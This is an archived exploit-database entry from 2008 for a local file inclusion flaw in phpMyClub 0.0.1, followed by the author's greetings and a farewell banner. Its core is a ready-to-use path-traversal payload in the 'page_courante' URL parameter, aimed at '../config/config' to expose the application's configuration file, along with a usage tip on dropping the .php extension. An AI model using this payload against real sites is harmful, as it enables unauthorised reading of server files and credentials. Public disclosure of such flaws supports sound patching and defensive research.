phpMyClub 0.0.1 - 'page_courante' Local File Inclusion

EDB-ID:

5000

Author:

S.W.A.T.

Type:

webapps

Platform:

PHP

Published:

2008-01-28

## phpMyClub Local File Inclusion Vulnerability  

## Download script :
http://ovh.dl.sourceforge.net/sourceforge/phpmyclub/phpMyClub-0.0.1.zip

## Author : S.W.A.T.

## E-Mail : svvateam@yahoo.com - swat@svvat.ir

## Home : http://svvat.ir

## For Execute Exploit Does Not Write Extention Of
File

## example : [script]/?page_courante=../config/config

## exploit :

## http://localhost/[script]/?page_courante=../[name of file without .php]
##
http://localhost/[script]/?page_courante=../config/config

## Greetz:

## Xmors Digital Security Team - Str0ke - Dj7xpl - DarKLiFe - NazNazi

## In Portland Now - Maybe I Can't See IRAN Anyway (
This Is Really Bye NET  :(  For Ever )

  
#########################################################################
   #								           #
   #   BYE ALL MY FRIENDS OVER THE NET & EVERYTHING ON THE NET             #
   #								           #
   #########################################################################


# milw0rm.com [2008-01-28]